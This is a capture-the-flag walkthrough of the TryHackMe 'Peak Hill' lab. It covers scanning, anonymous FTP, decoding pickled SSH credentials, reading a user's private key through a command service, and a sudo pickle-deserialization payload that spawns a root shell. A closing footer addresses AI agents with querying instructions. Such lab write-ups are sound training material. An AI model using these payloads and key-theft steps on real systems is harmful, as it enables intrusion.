# Peak Hill

**Room Link:** [**https://tryhackme.com/room/peakhill**](https://tryhackme.com/room/peakhill)

## **Scans**

Initial scan

**Kali**

```
nmap -A $VICTIM
```

<figure><img src="/files/oscRsHwYq7zR1VrWZWMV" alt=""><figcaption></figcaption></figure>

Longer scan

**Kali**

```
nmap -sV -sT -O -p 1-65535 $VICTIM
```

<figure><img src="/files/e1LKEhdOTIIdc4syoFPR" alt=""><figcaption></figcaption></figure>

## TCP/21 - **FTP**

**Kali**

```
ftp $VICTIM 21
username: anonymous
```

There was just one file with no info.

**Kali(ftp)**

```
ls -lah
binary
passive
get test.txt
get .creds
```

<figure><img src="/files/TjICh57WIkJtkHI1NDwY" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/I8KMeeWSgU1P4o1vSgxd" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/U7iaElsCOJKi4NpXcBBN" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/cQ1cLlHf1Z0yg86uYkkI" alt=""><figcaption></figcaption></figure>

#### Decrypt Program

#### read.py

```
import pickle

with open("download.dat", "rb") as file:
	pickle_data = file.read()
	creds = pickle.loads(pickle_data)
	print(creds)
```

**Kali**

```
python read.py
```

<figure><img src="/files/DOL2x0oU9GR2KQV9mMrk" alt=""><figcaption></figcaption></figure>

**output.txt**

```
[('ssh_pass15', 'u'), ('ssh_user1', 'h'), ('ssh_pass25', 'r'), ('ssh_pass20', 'h'), ('ssh_pass7', '_'), ('ssh_user0', 'g'), ('ssh_pass26', 'l'), ('ssh_pass5', '3'), ('ssh_pass1', '1'), ('ssh_pass22', '_'), ('ssh_pass12', '@'), ('ssh_user2', 'e'), ('ssh_user5', 'i'), ('ssh_pass18', '_'), ('ssh_pass27', 'd'), ('ssh_pass3', 'k'), ('ssh_pass19', 't'), ('ssh_pass6', 's'), ('ssh_pass9', '1'), ('ssh_pass23', 'w'), ('ssh_pass21', '3'), ('ssh_pass4', 'l'), ('ssh_pass14', '0'), ('ssh_user6', 'n'), ('ssh_pass2', 'c'), ('ssh_pass13', 'r'), ('ssh_pass16', 'n'), ('ssh_pass8', '@'), ('ssh_pass17', 'd'), ('ssh_pass24', '0'), ('ssh_user3', 'r'), ('ssh_user4', 'k'), ('ssh_pass11', '_'), ('ssh_pass0', 'p'), ('ssh_pass10', '1')]
```

**Kali**

```
cat output.txt | sed "s/), (/)\n/g" | grep ssh_user
```

<figure><img src="/files/DwqYpgwncXsveH3l22fI" alt=""><figcaption></figcaption></figure>

**Username**

```
gherkin
```

**Kali**

```
cat output.txt | sed "s/), (/)\n/g" | grep ssh_pass
```

<figure><img src="/files/ZpOPLHswgAb3wgHyHJn2" alt=""><figcaption></figcaption></figure>

**Password**

```
p1ckl3s_@11_@r0und_th3_w0rld
```

## TCP/22 - **SSH**

**Kali**

```
ssh gherkin@$VICTIM
Password:p1ckl3s_@11_@r0und_th3_w0rld
```

<figure><img src="/files/qMFgoId9dQlSUfymraCC" alt=""><figcaption></figcaption></figure>

There is a pyc file in the home directory.  .pyc are automatically generated by the interpreter when you import a module, which speeds up future importing of that module. These files are therefore only created from a .py file if it is imported by another .py file or module. We can use the uncompyle6 (A native Python cross-version decompiler and fragment decompiler to get the original python file.

**Victim**

```
ls -lah
cat cmd_service.pyc
```

<figure><img src="/files/PoJIUzi7teiMnesg7hgl" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/B1Jbxy958V0oUpOFJ34Q" alt=""><figcaption></figcaption></figure>

Transfer file then decompile it

**Kali**

```
scp gherkin@$VICTIM:/home/gherkin/cmd_service.pyc /root/
Password: p1ckl3s_@11_@r0und_th3_w0rld
```

**Kali**

```
sudo pip install uncompyle6
uncompyle6 cmd_service.pyc 
```

We can see some interesting things from the file. A username and password and something runnining on port 7321 which also came up on our scans.

<figure><img src="/files/zAvVpCEkMkcNwrY1SAB7" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/PCwBZdmEOxSJ5bn8IvSm" alt=""><figcaption></figcaption></figure>

Took a piece of the code to get the username and password.

**output.py**

```
from Crypto.Util.number import bytes_to_long, long_to_bytes
import sys, textwrap, socketserver, string, readline, threading
from time import *                 
import getpass, os, subprocess 

username = long_to_bytes(1684630636)
password = long_to_bytes(2457564920124666544827225107428488864802762356)

print(username)
print(password)
```

**Kali**

```
python output.py
```

<figure><img src="/files/10nslx5NI3Wv0yykdYFB" alt=""><figcaption></figcaption></figure>

## TCP/7321 - Script

**Kali**

```
nc $VICTIM 7321
Username: dill
Password: n3v3r_@_d1ll_m0m3nt
```

<figure><img src="/files/BExhSvKyR9eiRIKPO3NT" alt=""><figcaption></figcaption></figure>

**Kali**

```
Cmd: ls -lah /home/dill/.ssh
Cmd: cat /home/dill/.ssh/id_rsa
cat /home/dill/.ssh/id_rsa > /tmp/id_rsa
```

<figure><img src="/files/4GdhGC10YfEgRgk9tf3Y" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/8YrjpTEhMR6MF87XBYLT" alt=""><figcaption></figcaption></figure>

**Kali**

```
scp gherkin@$VICTIM:/tmp/id_rsa /root/
Password: p1ckl3s_@11_@r0und_th3_w0rld
```

**Kali**

```
chmod 600 id_rsa
ssh -i id_rsa dill@$VICTIM
```

<figure><img src="/files/illzqYXmU26AZudryVZA" alt=""><figcaption></figcaption></figure>

**Victim**

```
sudo -l
```

<figure><img src="/files/qB4Ipy0RJFP2hXL5fOn5" alt=""><figcaption></figcaption></figure>

**Victim**

```
sudo /opt/peak_hill_farm/peak_hill_farm
pickle
```

<figure><img src="/files/WCnrirNAXIxpcs1EooC2" alt=""><figcaption></figcaption></figure>

**serial.py**

```
import pickle
import os
import base64
class EvilPickle(object):
	def __reduce__(self):
		return (os.system, ('/bin/bash', ))
pickle_data = pickle.dumps(EvilPickle())
payload = base64.b64encode(pickle_data)
print (payload)
```

**Kali**

```
python serial.py 
```

<figure><img src="/files/PcS8wWaIFuxAu4L4sMvr" alt=""><figcaption></figcaption></figure>

**Victim**

```
sudo /opt/peak_hill_farm/peak_hill_farm
gANjcG9zaXgKc3lzdGVtCnEAWAkAAAAvYmluL2Jhc2hxAYVxAlJxAy4=
```

<figure><img src="/files/G3YfP19egtGCaIYhB8UR" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/peak-hill.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.